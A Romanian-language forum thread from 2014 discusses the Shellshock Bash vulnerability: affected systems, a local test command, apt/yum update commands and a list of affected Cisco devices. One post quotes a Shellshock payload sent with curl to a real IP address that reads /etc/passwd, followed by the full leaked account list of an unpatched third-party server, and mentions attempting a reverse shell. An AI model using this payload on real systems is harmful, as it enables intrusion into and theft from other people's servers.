Jump to content
Sign in to follow this  
pufosul

Shellshock Bash bug

Recommended Posts

 Dupa Heartbleed, urmeaza un nou exploit identificat se pare de echipa RedHat. Din cate am inteles e o problema de cod scris prost. Mai pe scurt cu exploitul asta poti castiga access root (un fel de admin) asupra unui server ce ruleaza o versiune de unix/linux, deci si cei care au Mac sunt afectati.

 

Majoritatea serverelor web ruland pe Apache/nginx, routerelor care au o versiune de linux (openwrt,dd-wrt) e cam nasoala treaba.

 

Ma intreb daca si routerele/switchurile Cisco, Juniper sunt afectate.


Memento Mori

Share this post


Link to post
Share on other sites

Trebuie menționat faptul că acest exploit poate fi activat numai pe sistemele care rulează servicii sau aplicații care permit userilor neautorizați accesarea/setarea prin remote a environment variables.
Exemple de sisteme vulnerabile:

  • Servere Apache care folosesc scripturi cgi care sunt scrise in Bash
  • Anumiți clienți DHCP
  • Servere OpenSSH care folosesc ForceCommand
  • Servicii de networking vulernabile care folosesc Bash

Mai multe detalii găsiți aici: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271 și http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
 
Ce putem face în acest caz? Cum testăm sistemul pentru această vulnerabilitate?
 
Scriem comanda asta în shell:
 

env VAR='() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test"

 
Porțiunea : echo Bash is vulnerable! reprezintă marea bubă. Aici un potențial atacator poate injecta cod malițios. Așa că dacă în urma executării comenzii de mai sus outputul îți dă ceva în genul:
 

Bash is vulnerable!
Bash Test

You're fucked!
 
Just kidding! :) Există un patch, (cică nefinalizat) dar care rezolvă problema. Așa că faceți update la bash:
 
APT-GET:
 


sudo apt-get update && sudo apt-get install --only-upgrade bash

 
YUM
 

sudo yum update bash

În legătură cu întrebarea ta pufosule, cred că trebuie întrebat la Cisco. :)

Share this post


Link to post
Share on other sites

Am testat pe serverele la munca. Au BASH 3.2, dar se pare ca nu e afectat. Am incercat sa obtin reverse shell :)

 

Se pare ca urmatoarele deviceuri sunt afectate de la Cisco

 

 

  • Cisco VCS devices (x7 and x8)
  • Cisco MXE 3500
  • Cisco DMM and SNS (assuming since running Red Hat Enterprise but unable to verify)
  • Jabber Guest
  • TCS Endpoints (6 or below have been verified, unable to verify 7 but assume vulnerable)
  • Cisco Conductor

 

Au scos deja semnaturi pt IPS-uri.

 

Un test pe un site care nu a fost patchuit inca.

curl -i -X HEAD "http://85.114.145.159/" -A '() { :;}; echo "BashSmash: " $(</etc/passwd)'

 

HTTP/1.1 301 Moved Permanently
Date: Thu, 25 Sep 2014 08:08:31 GMT
Server: Apache
BashBash: at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin: x:1:1:bin:/bin:/bin/bash
daemon: x:2:2:Daemon:/sbin:/bin/bash
ftp: x:40:49:FTP account:/srv/ftp:/bin/bash
games: x:12:100:Games account:/var/games:/bin/bash
haldaemon: x:104:107:User for haldaemon:/var/run/hald:/bin/false
lp: x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail: x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man: x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus: x:101:104:User for D-Bus:/var/run/dbus:/bin/false
news: x:9:13:News system:/etc/news:/bin/bash
nobody: x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp: x:74:102:NTP daemon:/var/lib/ntp:/bin/false
polkituser: x:103:106:PolicyKit:/var/run/PolicyKit:/bin/false
postfix: x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
root: x:0:0:root:/root:/bin/bash
suse-ncc: x:102:105:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp: x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
wwwrun: x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
norplex: x:1000:100:norplex:/home/norplex:/bin/bash
smmsp: x:1001:1000::/home/smmsp:/bin/bash
clamav: x:1002:1001:Clam AntiVirus:/home/clamav:/bin/false
mysql: x:1003:1002::/home/mysql:/bin/bash
httpd: x:1004:1003::/dev/local/httpd:/sbin/nologin
sshd: x:1005:1004:sshd privsep:/var/empty:/bin/false
nagios: x:1006:1005::/usr/local/nagios:/bin/bash
nolis: x:1008:100::/home/nolis:/bin/bash
neuzeit: x:1011:1008::/www/vhtdocs/neuzeit:/bin/false
sehnde: x:1012:1009::/www/vhtdocs/sehnde:/bin/false
burgwedel: x:1013:1010::/www/vhtdocs/burgwedel:/bin/false
regioncelle: x:1014:1011::/www/vhtdocs/regioncelle:/bin/false
gronau: x:1015:1012::/www/vhtdocs/gronau:/bin/false
osterode: x:1016:1013::/www/vhtdocs/osterode:/bin/false
ituelzen: x:1017:1014::/www/vhtdocs/ituelzen:/bin/false
celle: x:1018:1015::/www/vhtdocs/celle:/bin/false
buergertipps: x:1019:1016::/www/vhtdocs/buergertipps:/bin/false
obsburgwedel: x:1020:1017::/www/vhtdocs/obsburgwedel:/bin/false
schulausfall: x:1021:1018::/www/vhtdocs/schulausfall:/bin/false
cms: x:1022:1019::/www/vhtdocs/cms:/bin/false
hiller: x:1023:1020::/www/vhtdocs/hiller:/bin/false
signotec: x:1024:1021::/www/vhtdocs/signotec:/bin/false
hiab: x:1025:1022::/www/vhtdocs/hiab:/bin/false
kyffhaeusernds: x:1026:1023::/www/vhtdocs/kyffhaeusernds:/bin/false
jugendosterode: x:1027:1024::/www/vhtdocs/jugendosterode:/bin/false
saterland: x:1028:1025::/www/vhtdocs/saterland:/bin/false
bewerbung: x:1029:1026::/www/vhtdocs/bewerbung:/bin/false
cmsx: x:1030:1027::/www/vhtdocs/cmsx:/bin/false
lkwittmund: x:1031:1028::/www/vhtdocs/lkwittmund:/bin/false
nolisde: x:1032:1029::/www/vhtdocs/nolisde:/bin/false
grossenkn: x:1033:1030::/www/vhtdocs/grossenkn:/bin/false
bewerbungx: x:1034:1031::/www/vhtdocs/bewerbungx:/bin/false
bawn: x:1035:1032::/www/vhtdocs/bawn:/bin/false
emmebus: x:1036:1033::/www/vhtdocs/emmebus:/bin/false
emmebus01: x:1037:100::/home/emmebus01:/bin/false
emmebus02: x:1038:100::/home/emmebus02:/bin/false
bawnapp: x:1039:1034::/www/vhtdocs/bawnapp:/bin/false
hallewestfalen: x:1040:1035::/www/vhtdocs/hallewestfalen:/bin/false
barsbuettel: x:1041:1036::/www/vhtdocs/barsbuettel:/bin/false
pfotennavigator: x:1042:1037::/www/vhtdocs/pfotennavigator:/bin/false
dietomate: x:1043:1038::/www/vhtdocs/dietomate:/bin/false
ffosterode: x:1044:1039::/www/vhtdocs/ffosterode:/bin/false
ffosterode01: x:1045:100::/home/ffosterode01:/bin/false
goldschmiede: x:1046:1040::/www/vhtdocs/goldschmiede:/bin/false
loge: x:1047:1041::/www/vhtdocs/loge:/bin/false
kyffhaeusernds01: x:1048:100::/home/kyffhaeusernds01:/bin/false
wurzen: x:1049:1042::/www/vhtdocs/wurzen:/bin/false
rwgleese: x:1050:1043::/www/vhtdocs/rwgleese:/bin/false
rwgleese01: x:1051:100::/home/rwgleese01:/bin/false
rwgleese02: x:1052:100::/home/rwgleese02:/bin/false
rwgleese03: x:1053:100::/home/rwgleese03:/bin/false
rwgleese04: x:1054:100::/home/rwgleese04:/bin/false
rwgleese05: x:1055:100::/home/rwgleese05:/bin/false
rwgleese06: x:1056:100::/home/rwgleese06:/bin/false
rwgleese07: x:1057:100::/home/rwgleese07:/bin/false
rwgleese08: x:1058:100::/home/rwgleese08:/bin/false
rwgleese09: x:1059:100::/home/rwgleese09:/bin/false
rwgleese10: x:1060:100::/home/rwgleese10:/bin/false
brinkmann: x:1061:1044::/www/vhtdocs/brinkmann:/bin/false
brinkmann01: x:1062:100::/home/brinkmann01:/bin/false
brinkmann02: x:1063:100::/home/brinkmann02:/bin/false
tds: x:1064:1045::/www/vhtdocs/tds:/bin/falsei
Location: http://www.nolis.de
Content-Type: text/html

 

Luat de pe: http://0x4139.com/bashsmash-explained-what-does-the-vulnerability-mean-and-how-does-that-affect-you/

 

Iar un tip care scanase Internetul pentru servere problematice.

 

Nu credeam ca vine ziua cand Windows Server va deveni mai stabil ca Linux :)


Memento Mori

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
Sign in to follow this  

×
×
  • Create New...